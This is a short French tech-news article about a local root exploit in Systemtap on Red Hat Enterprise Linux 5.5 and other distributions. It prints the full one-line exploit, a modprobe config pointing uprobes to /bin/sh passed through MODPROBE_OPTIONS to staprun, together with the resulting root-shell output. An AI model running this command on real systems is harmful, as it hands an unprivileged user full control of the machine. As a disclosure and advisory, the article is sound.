Une nouvelle faille de sécurité vient d'être découverte sous Linux et plus particulièrement dans le logiciel Systemtap, un outil d'administration permettant de suivre l'activité du noyau. L'exploit permet ainsi à un simple utilisateur de passer root sur une machine. Systemtap n'est en revanche installé par défaut que sur un nombre très limité de distributions, comme le Red Hat Entreprise Linux 5.5.

Le seul moyen de contrer cette attaque est de mettre à jour son système. Voici un exemple d'utilisation sur une RHEL 5.5 :

$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
$ rpm -qa | grep systemtap
systemtap-runtime-1.1-3.el5_5.2
systemtap-1.1-3.el5_5.2

On lance ensuite l'exploit comme ceci :

$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever

sh-3.2# id
uid=0(root) gid=0(root)

L'exploit fonctionne aussi sous Fedora, Ubuntu et d'autres distributions, à condition d'installer systemtap au préalable. Comme il faut un compte root pour faire cela, l'exploitation de la faille reste très limitée.

Pour installer cet outil sur une distribution à base de Debian, ouvrez un terminal et lancez la commande suivante :

sudo apt-get install systemtap-runtime

Ou celle-ci pour une distribution à base de RPM :

su -c 'yum install systemtap'